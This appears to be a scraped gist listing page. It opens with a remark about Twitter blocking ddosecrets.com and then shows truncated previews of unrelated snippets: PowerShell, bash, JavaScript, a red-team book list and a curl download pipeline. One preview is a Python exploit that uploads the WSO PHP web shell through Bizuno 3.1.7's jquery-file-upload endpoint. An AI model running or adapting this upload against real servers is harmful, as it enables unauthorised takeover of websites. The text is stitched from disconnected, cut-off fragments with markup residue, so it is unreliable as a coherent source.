Twitter made ddosecrets.com a forbidden place. I don't like being forbidden from going places or sharing links to said places.
It's dangerous to go alone, take these:
function Invoke-PSCmdClient | |
{ | |
param( | |
[Parameter(Position=0)] | |
[string] $PipeName | |
) | |
$Pipe = [System.IO.Pipes.NamedPipeClientStream]::new('.', $PipeName, | |
[System.IO.Pipes.PipeDirection]::In) |
#!/usr/bin/python | |
import requests | |
# Host IP http://IP | |
host='Put IP HERE' | |
# JQuery path for Bizuno Library 3.1.7 | |
url=host+'/Books/apps/jquery-file-upload/server/php/index.php' | |
# Uploading the shell to the server. I use wso-4.2.5.php in this example: | |
files = {'files': open('wso-4.2.5.php', 'rb')} | |
r = requests.post(url, files=files) | |
# Location of Shell/Name - wso.php |
#!/bin/bash -i | |
#using shebang with -i to enable interactive mode (auto load .bashrc) | |
set -e #stop immediately if any error happens | |
# Install Open SDK | |
apt update | |
apt install openjdk-8-jdk -y | |
update-java-alternatives --set java-1.8.0-openjdk-amd64 | |
java -version |
Credit to @jkishner for https://gist.github.com/jkishner/2fccb24640a27c2d7ac9
Also interesting: https://gist.github.com/cdown/1163649
// Colors reference | |
// You can use the following as so: | |
// console.log(colorCode, data); | |
// console.log(`${colorCode}some colorful text string${resetCode} rest of string in normal color`); | |
// | |
// ... and so on. | |
export const reset = "\x1b[0m" | |
export const bright = "\x1b[1m" | |
export const dim = "\x1b[2m" |
From: http://redteams.net/bookshelf/ | |
Techie | |
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
curl
to get the JSON response for the latest releasegrep
to find the line containing file URLcut
and tr
to extract the URLwget
to download itcurl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \